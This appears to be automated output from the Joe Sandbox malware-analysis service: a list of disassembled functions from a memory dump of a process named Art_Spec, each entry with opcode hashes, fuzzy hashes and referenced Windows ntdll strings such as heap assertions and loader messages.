                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-4253913091
                                                        • Opcode ID: 5fdf76fb31e97de2e2054c54231651551cdf19dd5bc9bca15b17a7828d1fa05a
                                                        • Instruction ID: 93f0bb6ac985914c74a6b6fae4ffb67b9339df73bd9e5a15c8d7f02e6c9aed8e
                                                        • Opcode Fuzzy Hash: 5fdf76fb31e97de2e2054c54231651551cdf19dd5bc9bca15b17a7828d1fa05a
                                                        • Instruction Fuzzy Hash: 43F1BE35A00646DFEB19CF68C880BAABBB5FB85708F14816DE4169B765D730ED81CF90
                                                        Function 013D6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $@
                                                        • API String ID: 0-1077428164
                                                        • Opcode ID: 4fd45fca6b7739d655b60f08f9b061adb2e0bc8748e31a555b3c8dffa6d063bf
                                                        • Instruction ID: 086f95248a21ce0e65c144c5642ceecadf01afd5ac3f049778401ea7649d0f99
                                                        • Opcode Fuzzy Hash: 4fd45fca6b7739d655b60f08f9b061adb2e0bc8748e31a555b3c8dffa6d063bf
                                                        • Instruction Fuzzy Hash: 8BC2B2726083459FDB25CF28D881BABBBE5BF88718F04892EF999C7251D734D805CB52
                                                        Function 013AA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                        • API String ID: 0-2779062949
                                                        • Opcode ID: 2a70e88bec6f0a6142f807adca75dd233c7a5a14dcdf3182d5b96f6a036575f5
                                                        • Instruction ID: 5771c9fc42a61e4189008d2b1536b4daba44001371faf4aa269bca735bcbec6d
                                                        • Opcode Fuzzy Hash: 2a70e88bec6f0a6142f807adca75dd233c7a5a14dcdf3182d5b96f6a036575f5
                                                        • Instruction Fuzzy Hash: 2AA15F72911629DBDB32DF69CC88BAAB7B8FF44704F1141EAE908A7250D7359E84CF50
                                                        Function 013D0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0141A121
                                                        • LdrpCheckModule, xrefs: 0141A117
                                                        • Failed to allocated memory for shimmed module list, xrefs: 0141A10F
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-161242083
                                                        • Opcode ID: a631e5a0e0727c515cce23c3690fc42dd1b02d3df306a73566915c2328bbaf9b
                                                        • Instruction ID: 2983e3e291ec7908d4c44e701427f5e219d4689c780991cbaf981e90f01c668e
                                                        • Opcode Fuzzy Hash: a631e5a0e0727c515cce23c3690fc42dd1b02d3df306a73566915c2328bbaf9b
                                                        • Instruction Fuzzy Hash: 8671D1B1A002059FDF29DF6CD980ABEBBF4FB44A08F19402DE506AB765E734AD41CB50
                                                        Function 013C0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-1334570610
                                                        • Opcode ID: f4f6f1569689dc7554fb05074ccd3c5cabe3cb66285cfb3f9dd4ffe296452360
                                                        • Instruction ID: f209865d57941bdbd0218a08a61b2dac6729e907fbc50a158814f57214d5bac9
                                                        • Opcode Fuzzy Hash: f4f6f1569689dc7554fb05074ccd3c5cabe3cb66285cfb3f9dd4ffe296452360
                                                        • Instruction Fuzzy Hash: DA61E074600345DFEB29CF28C480BAABBE5FF45B08F14855EE4598F2A6D770E881CB90
                                                        Function 0146C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0146C1C5
                                                        • PreferredUILanguages, xrefs: 0146C212
                                                        • @, xrefs: 0146C1F1
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                        • API String ID: 0-2968386058
                                                        • Opcode ID: d44b02483116f3e632dff15b7d50a7a5461e1b599dff7d72af70863989c650a9
                                                        • Instruction ID: a150486e8eb63ff13dc0714f9924d3a23a45c620a103b11abf7f0bcc787cabdc
                                                        • Opcode Fuzzy Hash: d44b02483116f3e632dff15b7d50a7a5461e1b599dff7d72af70863989c650a9
                                                        • Instruction Fuzzy Hash: 09416271E0020AEBDF11DBD8C881BEFBBBCAB14718F14406BEA49A7260D7749A458B51
                                                        Function 01444144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                        • API String ID: 0-1373925480
                                                        • Opcode ID: 8b551baaaf282075f38f594e85aedec1363ccde1b69c85d4464242a5d74af159
                                                        • Instruction ID: 55a1426ecdee01a6f9fa44f7773059998c906e9108f7eef81f3461b12dc79824
                                                        • Opcode Fuzzy Hash: 8b551baaaf282075f38f594e85aedec1363ccde1b69c85d4464242a5d74af159
                                                        • Instruction Fuzzy Hash: AC411371A046488BFB22DBD9C844BAEBBB4FF55384F18045BD901EB7A1D7349901CB11
                                                        Function 01434755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01434899
                                                        • LdrpCheckRedirection, xrefs: 0143488F
                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01434888
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                        • API String ID: 0-3154609507
                                                        • Opcode ID: d2f53c51bb7b0e3fa512b2b3f9373b4a7ba5c014d0a04f09f7636cfdff98e331
                                                        • Instruction ID: a59b6cd7b3a0b0008a54d1482b4ae278a05a27e9b680b01950ebe0d6a0b94157
                                                        • Opcode Fuzzy Hash: d2f53c51bb7b0e3fa512b2b3f9373b4a7ba5c014d0a04f09f7636cfdff98e331
                                                        • Instruction Fuzzy Hash: 5341CF3AA142519BCB26CF29D840AA7BBE5AFCDB50B1A055FED489B371D730D800CB91
                                                        Function 013C0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-2558761708
                                                        • Opcode ID: cd1c9a941e54c16d72543a06e7f083ccb59163bdf9e1816ba1b3f3c0ba831059
                                                        • Instruction ID: 387ed38da5562c7e1609fc7b163946080f6f425336eb97efb95b7caa81dd08e7
                                                        • Opcode Fuzzy Hash: cd1c9a941e54c16d72543a06e7f083ccb59163bdf9e1816ba1b3f3c0ba831059
                                                        • Instruction Fuzzy Hash: B111AE35395181DFD629DA18C440BA6B7A4EB82B19F18812EF4068F269DB30DC41C750
                                                        Function 014320DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • LdrpInitializationFailure, xrefs: 014320FA
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01432104
                                                        • Process initialization failed with status 0x%08lx, xrefs: 014320F3
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-2986994758
                                                        • Opcode ID: 2b9a557a82f890365b654b6d2082ea2bf7b50d718ce48c9bb448b0615042058f
                                                        • Instruction ID: 0019028c5fe3d3319bbd215de92dd5e86541822ad5e929f12089fb6fc8041514
                                                        • Opcode Fuzzy Hash: 2b9a557a82f890365b654b6d2082ea2bf7b50d718ce48c9bb448b0615042058f
                                                        • Instruction Fuzzy Hash: 98F0C875640309BBEB24EA4DDD42F977F68EB84B58F51005AF6047B395D1F0A940CA91
                                                        Function 013C03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: #%u
                                                        • API String ID: 48624451-232158463
                                                        • Opcode ID: c44021722dcdeeb37e6e979136a1a689c7e9ced5938e9a38de0850c675eeabd5
                                                        • Instruction ID: 2c32e8ba161e594422a84261333b95273137a595c7bdd94b8ca1ba5925cff950
                                                        • Opcode Fuzzy Hash: c44021722dcdeeb37e6e979136a1a689c7e9ced5938e9a38de0850c675eeabd5
                                                        • Instruction Fuzzy Hash: 44715C71A0014A9FDB05DFA9C994BAEB7F8FF18704F15406AE905E7261EB34ED01CBA0
                                                        Function 013BA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • LdrResSearchResource Exit, xrefs: 013BAA25
                                                        • LdrResSearchResource Enter, xrefs: 013BAA13
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                        • API String ID: 0-4066393604
                                                        • Opcode ID: e26e79876e379cedf01ceef3a96930cdcfde804def4ca321522d3cebf4de6497
                                                        • Instruction ID: 20e519a38c8f06e39ee95704fa6c9b1562e731b7232654ec3dcf3a2f69b0fd7b
                                                        • Opcode Fuzzy Hash: e26e79876e379cedf01ceef3a96930cdcfde804def4ca321522d3cebf4de6497
                                                        • Instruction Fuzzy Hash: 21E18171E006199FEF21CF9DC980BEEBBB9BF04318F14442AEA11E7A65E7749941CB50
                                                        Function 0147A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: `$`
                                                        • API String ID: 0-197956300
                                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                        • Instruction ID: cab5d24b21fc1038804d125b04219d735143ff7776ed248051fa0ef0d873dd02
                                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                        • Instruction Fuzzy Hash: 2FC1D4312043429BE724CF29C845BAFBBE5AFD4718F284A2EF695CB2A0D775D505CB41
                                                        Function 0142E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: Legacy$UEFI
                                                        • API String ID: 2994545307-634100481
                                                        • Opcode ID: 6376ac9940293bfa72c8132c5a795895eacf709244bd64be95fc950db88be81b
                                                        • Instruction ID: b48860c3f5359b07b6209e72c6f4db9fdf935632a4c1620f253b1cd26ed1ef8a
                                                        • Opcode Fuzzy Hash: 6376ac9940293bfa72c8132c5a795895eacf709244bd64be95fc950db88be81b
                                                        • Instruction Fuzzy Hash: FC616B71E002299FDB14DFA9C840BAEBBB9FB44704F54406EE649EB2A1D771E981CB50
                                                        Function 014543D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$MUI
                                                        • API String ID: 0-17815947
                                                        • Opcode ID: 32cf3042d27560c7e87874c2ed20a041f6898b6b57a10d28c13188a19b9b547f
                                                        • Instruction ID: d742277bbe17674e0eb9582b27a62994379a89e2f6841bdcacde3981cd926104
                                                        • Opcode Fuzzy Hash: 32cf3042d27560c7e87874c2ed20a041f6898b6b57a10d28c13188a19b9b547f
                                                        • Instruction Fuzzy Hash: 4C512A71D0021DAFDF51DFA9CC84AEFBBB8EB44758F14052AEA11BB291E6309D45CB60
                                                        Function 013B04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 013B063D
                                                        • kLsE, xrefs: 013B0540
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                        • API String ID: 0-2547482624
                                                        • Opcode ID: e4a6dc631df09f60264c87d7198d7f37d6513582892ec248e03125ee5922f7d0
                                                        • Instruction ID: 5257ff025431090344233ede5645310ae1de7104cb3161c832164bebb76397bd
                                                        • Opcode Fuzzy Hash: e4a6dc631df09f60264c87d7198d7f37d6513582892ec248e03125ee5922f7d0
                                                        • Instruction Fuzzy Hash: 66517C715047428BD728DF68C5807E7BBF4EF94318F14483EE6AA87A41F770A545CB92
                                                        Function 013BA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 013BA2FB
                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 013BA309
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                        • API String ID: 0-2876891731
                                                        • Opcode ID: a4b9492d2527830f8fc6696e7f79288922565c926503e5e41b343519d8b7fc84
                                                        • Instruction ID: 86d3173767fc187c5f0be1c2aa6b1ec80f9ec9d16f90057553be64f24ac8a37c
                                                        • Opcode Fuzzy Hash: a4b9492d2527830f8fc6696e7f79288922565c926503e5e41b343519d8b7fc84
                                                        • Instruction Fuzzy Hash: F341B031A05A59DBDB11DF5DC480BAE7BB4FF84708F24406AEA08DBBA5E3B5D900CB50
                                                        Function 013EA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: Cleanup Group$Threadpool!
                                                        • API String ID: 2994545307-4008356553
                                                        • Opcode ID: 3f7c34b7d31cf3c587593949c98b315699cbe95d3d2420713857caa99ad077ed
                                                        • Instruction ID: 0597a406809cbf1e97d95ed8206166a20244d445aa1b20ac56fc4b2bc1c218da
                                                        • Opcode Fuzzy Hash: 3f7c34b7d31cf3c587593949c98b315699cbe95d3d2420713857caa99ad077ed
                                                        • Instruction Fuzzy Hash: 1E01D1B2250704AFD311DF24CE49B167BE8F785729F068979A658C71D0E334D804CB46
                                                        Function 013BC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: MUI
                                                        • API String ID: 0-1339004836
                                                        • Opcode ID: 5b5a48d2fed55ba966d3e840051a7892406cc327bb3d5650e3df7b2c08cf6193
                                                        • Instruction ID: bb445609edc4b43f278e99882f30ddba3bd0a8f2e2bce69c571744e7d704ddcb
                                                        • Opcode Fuzzy Hash: 5b5a48d2fed55ba966d3e840051a7892406cc327bb3d5650e3df7b2c08cf6193
                                                        • Instruction Fuzzy Hash: 3A825D75E002198FEB25CFA9C8C07EDBBB5BF44318F148169EA59ABB51EB309D41CB50
                                                        Function 01436420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: a86e51bef6377dd8b10edc2a8e52850e01924d5493fdb97b4d5e5ec5890aaa9a
                                                        • Instruction ID: 1b07fe068d89d35f33d288629efcc27ccca211ac7c99e2a337f69595e1446181
                                                        • Opcode Fuzzy Hash: a86e51bef6377dd8b10edc2a8e52850e01924d5493fdb97b4d5e5ec5890aaa9a
                                                        • Instruction Fuzzy Hash: 2191637290021ABFEB21DB99DC85FAE7BB8EF58B54F154065F604AB1A0D674AD00CB60
                                                        Function 0145E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: 838a76c078e089f38ea251dfd5fd3b48f0532d9131388a30b0e41aac6d93901e
                                                        • Instruction ID: dbcd99a89da3621e16039f939b79a22567287320a1988e2ffeeff47e049c6692
                                                        • Opcode Fuzzy Hash: 838a76c078e089f38ea251dfd5fd3b48f0532d9131388a30b0e41aac6d93901e
                                                        • Instruction Fuzzy Hash: 59918072900605ABDB22AFA9DC44FEFFB79EF45754F10002AFA05B7262D7349A02CB50
                                                        Function 013EA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: GlobalTags
                                                        • API String ID: 0-1106856819
                                                        • Opcode ID: 3722a6430008c22149d36e48ea4fc8cc234ec4300e3841d76835c0142b8e0a0b
                                                        • Instruction ID: 73334e4645a8d05d6574ea0dd6420b06bd97d3f8a31df5722d52c62ed2211a16
                                                        • Opcode Fuzzy Hash: 3722a6430008c22149d36e48ea4fc8cc234ec4300e3841d76835c0142b8e0a0b
                                                        • Instruction Fuzzy Hash: A1719175E0122ACFDF28CF9DD5806AEBBB1BF88710F55812EE905A7351E7709881CB50
                                                        Function 01454978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .mui
                                                        • API String ID: 0-1199573805
                                                        • Opcode ID: 62a78676522fc55d64f9e1149274a6f9472279e944c0f88ed78908d3c7097448
                                                        • Instruction ID: f8dafdc063d416c0827665667637a2af8849dba38b5d130a24c5a2341be66dac
                                                        • Opcode Fuzzy Hash: 62a78676522fc55d64f9e1149274a6f9472279e944c0f88ed78908d3c7097448
                                                        • Instruction Fuzzy Hash: 9D51A772D002259BDF50DFADD840AEEBBB4AF04614F09412AEE11BB361E7349D41CBE4
                                                        Function 013CE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: EXT-
                                                        • API String ID: 0-1948896318
                                                        • Opcode ID: 512f61578567f1271f6b32818e8e2320a8c0454865bfa748dd6370b21124e676
                                                        • Instruction ID: 0093f79b06e69cb8187e1cb5a270ccd962f8f072090e0fa4ee44f4aa25c3248b
                                                        • Opcode Fuzzy Hash: 512f61578567f1271f6b32818e8e2320a8c0454865bfa748dd6370b21124e676
                                                        • Instruction Fuzzy Hash: 274180725083529BD721DA79D940B6BBBE8AF88A1CF44093DF684E7140EA74DD04C796
                                                        Function 0142C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: BinaryHash
                                                        • API String ID: 0-2202222882
                                                        • Opcode ID: cf94d734ed713d02239605ff09d826a8b94d9a055ea01a064b256cff2c4a251a
                                                        • Instruction ID: 465844f2142b30c5f55c5e84d8612086ba8203dba16427e199768ba50d8b5671
                                                        • Opcode Fuzzy Hash: cf94d734ed713d02239605ff09d826a8b94d9a055ea01a064b256cff2c4a251a
                                                        • Instruction Fuzzy Hash: 1C4166B1D0052DAADB21DA54CC84FDEB77CAB54718F4085EAEB08AB150DB709E898F94
                                                        Function 01446B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: #
                                                        • API String ID: 0-1885708031
                                                        • Opcode ID: 2a711413ca69e69e39fc17f2d41143b19a5720abe62ba31b1017b334e51deb62
                                                        • Instruction ID: ebc11a48d5ffedeeec47e3e7921d571d3cc9c1d926fd5950244eac9ea288fd61
                                                        • Opcode Fuzzy Hash: 2a711413ca69e69e39fc17f2d41143b19a5720abe62ba31b1017b334e51deb62
                                                        • Instruction Fuzzy Hash: A0310931A006599BFB22CB6DC850BAFBBA8DF06704F15402AE940AB2A1D775DC45CB54
                                                        Function 0142CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: BinaryName
                                                        • API String ID: 0-215506332
                                                        • Opcode ID: 93024c041f565f2bb770d8bc8689c7c7de36f7766769bfa19673d7dbd14f97c3
                                                        • Instruction ID: 8c51e93bc99bfbd2bd2695a6ad8159e49e8381af39451bbfc7147c1c3050dacb
                                                        • Opcode Fuzzy Hash: 93024c041f565f2bb770d8bc8689c7c7de36f7766769bfa19673d7dbd14f97c3
                                                        • Instruction Fuzzy Hash: 7431033690052AAFEB15DB5CD891E6FBF74EB80764F41812AEA05A7260D7309E44DBE0
                                                        Function 013DEA2E Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: H4
                                                        • API String ID: 0-2782618040
                                                        • Opcode ID: 0d43c9d0037d91c4ee63279967b0f79d5a13933f7d4c01d78d63bc165efc6510
                                                        • Instruction ID: 6da7e6134a6acaaf30bd654bf8e5d88367428a6c4b22c89986dedc2708629e3e
                                                        • Opcode Fuzzy Hash: 0d43c9d0037d91c4ee63279967b0f79d5a13933f7d4c01d78d63bc165efc6510
                                                        • Instruction Fuzzy Hash: 5101C0725001069FE725DB18E584E56BFE9EB91318F61817AE1058F265D770EC42CB90
                                                        Function 0143892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0143895E
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                        • API String ID: 0-702105204
